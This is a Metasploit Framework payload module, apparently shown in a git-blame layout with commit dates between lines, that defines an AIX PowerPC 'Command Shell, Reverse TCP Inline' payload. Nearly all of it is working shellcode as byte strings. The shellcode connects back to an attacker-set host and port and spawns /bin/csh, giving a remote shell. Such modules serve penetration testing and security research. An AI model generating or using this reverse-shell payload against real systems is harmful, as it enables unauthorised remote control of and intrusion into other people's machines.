2008-11-13 01:58:36 +00:00
|
|
|
##
|
2010-02-24 01:19:59 +00:00
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
2008-11-13 01:58:36 +00:00
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
2012-02-21 01:40:50 +00:00
|
|
|
# web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/
|
2008-11-13 01:58:36 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
require 'msf/core/handler/reverse_tcp'
|
|
|
|
require 'msf/base/sessions/command_shell'
|
2010-02-24 01:19:59 +00:00
|
|
|
require 'msf/base/sessions/command_shell_options'
|
2008-11-13 01:58:36 +00:00
|
|
|
|
|
|
|
module Metasploit3
|
|
|
|
|
|
|
|
include Msf::Payload::Single
|
2009-06-23 03:49:25 +00:00
|
|
|
include Msf::Payload::Aix
|
2010-02-24 01:19:59 +00:00
|
|
|
include Msf::Sessions::CommandShellOptions
|
2008-11-13 01:58:36 +00:00
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(merge_info(info,
|
|
|
|
'Name' => 'AIX Command Shell, Reverse TCP Inline',
|
|
|
|
'Description' => 'Connect back to attacker and spawn a command shell',
|
2012-09-19 14:55:30 +00:00
|
|
|
'Author' => 'Ramon de C Valle',
|
2008-11-13 01:58:36 +00:00
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Platform' => 'aix',
|
|
|
|
'Arch' => ARCH_PPC,
|
|
|
|
'Handler' => Msf::Handler::ReverseTcp,
|
2010-12-27 17:46:42 +00:00
|
|
|
'Session' => Msf::Sessions::CommandShellUnix,
|
2008-11-13 01:58:36 +00:00
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
'Offsets' =>
|
|
|
|
{
|
|
|
|
'LHOST' => [ 32, 'ADDR' ],
|
|
|
|
'LPORT' => [ 30, 'n' ],
|
|
|
|
},
|
|
|
|
}
|
|
|
|
))
|
|
|
|
|
|
|
|
end
|
|
|
|
|
2009-06-23 03:49:25 +00:00
|
|
|
def generate(*args)
|
|
|
|
super(*args)
|
2008-11-13 01:58:36 +00:00
|
|
|
|
2009-06-23 03:49:25 +00:00
|
|
|
payload =
|
2008-11-13 01:58:36 +00:00
|
|
|
"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 #
|
|
|
|
"\x40\x82\xff\xfd" +# bnel <cntsockcode> #
|
|
|
|
"\x7f\xc8\x02\xa6" +# mflr r30 #
|
|
|
|
"\x3b\xde\x01\xff" +# cal r30,511(r30) #
|
|
|
|
"\x3b\xde\xfe\x25" +# cal r30,-475(r30) #
|
|
|
|
"\x7f\xc9\x03\xa6" +# mtctr r30 #
|
|
|
|
"\x4e\x80\x04\x20" +# bctr #
|
2009-06-23 03:49:25 +00:00
|
|
|
"\xff\x02\x11\x5c" +# .long 0xff02115c #
|
2008-11-13 01:58:36 +00:00
|
|
|
"\x7f\x00\x00\x01" +# .long 0x7f000001 #
|
|
|
|
"\x4c\xc6\x33\x42" +# crorc 6,6,6 #
|
|
|
|
"\x44\xff\xff\x02" +# svca 0 #
|
|
|
|
"\x3b\xde\xff\xf8" +# cal r30,-8(r30) #
|
2010-05-23 19:47:48 +00:00
|
|
|
"\x3b\xa0\x07\xff" +# lil r29,2047 #
|
|
|
|
"\x38\x9d\xf8\x02" +# cal r4,-2046(r29) #
|
|
|
|
"\x38\x7d\xf8\x03" +# cal r3,-2045(r29) #
|
2009-06-23 03:49:25 +00:00
|
|
|
@cal_socket +
|
2008-11-13 01:58:36 +00:00
|
|
|
"\x7f\xc9\x03\xa6" +# mtctr r30 #
|
|
|
|
"\x4e\x80\x04\x21" +# bctrl #
|
|
|
|
"\x7c\x7c\x1b\x78" +# mr r28,r3 #
|
2010-05-23 19:47:48 +00:00
|
|
|
"\x38\xbd\xf8\x11" +# cal r5,-2031(r29) #
|
2008-11-13 01:58:36 +00:00
|
|
|
"\x38\x9e\xff\xf8" +# cal r4,-8(r30) #
|
2009-06-23 03:49:25 +00:00
|
|
|
@cal_connect +
|
2008-11-13 01:58:36 +00:00
|
|
|
"\x7f\xc9\x03\xa6" +# mtctr r30 #
|
|
|
|
"\x4e\x80\x04\x21" +# bctrl #
|
2010-05-23 19:47:48 +00:00
|
|
|
"\x3b\x7d\xf8\x03" +# cal r27,-2045(r29) #
|
2008-11-13 01:58:36 +00:00
|
|
|
"\x7f\x63\xdb\x78" +# mr r3,r27 #
|
2009-06-23 03:49:25 +00:00
|
|
|
@cal_close +
|
2008-11-13 01:58:36 +00:00
|
|
|
"\x7f\xc9\x03\xa6" +# mtctr r30 #
|
|
|
|
"\x4e\x80\x04\x21" +# bctrl #
|
|
|
|
"\x7f\x65\xdb\x78" +# mr r5,r27 #
|
|
|
|
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
|
|
|
|
"\x7f\x83\xe3\x78" +# mr r3,r28 #
|
2009-06-23 03:49:25 +00:00
|
|
|
@cal_kfcntl +
|
2008-11-13 01:58:36 +00:00
|
|
|
"\x7f\xc9\x03\xa6" +# mtctr r30 #
|
|
|
|
"\x4e\x80\x04\x21" +# bctrl #
|
|
|
|
"\x37\x7b\xff\xff" +# ai. r27,r27,-1 #
|
|
|
|
"\x40\x80\xff\xd4" +# bge <cntsockcode+100> #
|
|
|
|
"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 #
|
|
|
|
"\x40\x82\xff\xfd" +# bnel <cntsockcode+148> #
|
|
|
|
"\x7f\x08\x02\xa6" +# mflr r24 #
|
|
|
|
"\x3b\x18\x01\xff" +# cal r24,511(r24) #
|
|
|
|
"\x38\x78\xfe\x29" +# cal r3,-471(r24) #
|
|
|
|
"\x98\xb8\xfe\x31" +# stb r5,-463(r24) #
|
|
|
|
"\x94\xa1\xff\xfc" +# stu r5,-4(r1) #
|
|
|
|
"\x94\x61\xff\xfc" +# stu r3,-4(r1) #
|
|
|
|
"\x7c\x24\x0b\x78" +# mr r4,r1 #
|
2009-06-23 03:49:25 +00:00
|
|
|
@cal_execve +
|
2008-11-13 01:58:36 +00:00
|
|
|
"\x7f\xc9\x03\xa6" +# mtctr r30 #
|
2009-07-28 04:46:57 +00:00
|
|
|
"\x4e\x80\x04\x21" +# bctrl #
|
2008-11-13 01:58:36 +00:00
|
|
|
"/bin/csh"
|
|
|
|
|
2010-05-23 19:47:48 +00:00
|
|
|
# If the payload is generated and there are offsets to substitute,
|
2010-02-08 22:41:36 +00:00
|
|
|
# do that now.
|
|
|
|
if (payload and offsets)
|
|
|
|
substitute_vars(payload, offsets)
|
|
|
|
end
|
|
|
|
|
|
|
|
payload
|
2008-11-13 01:58:36 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
end
|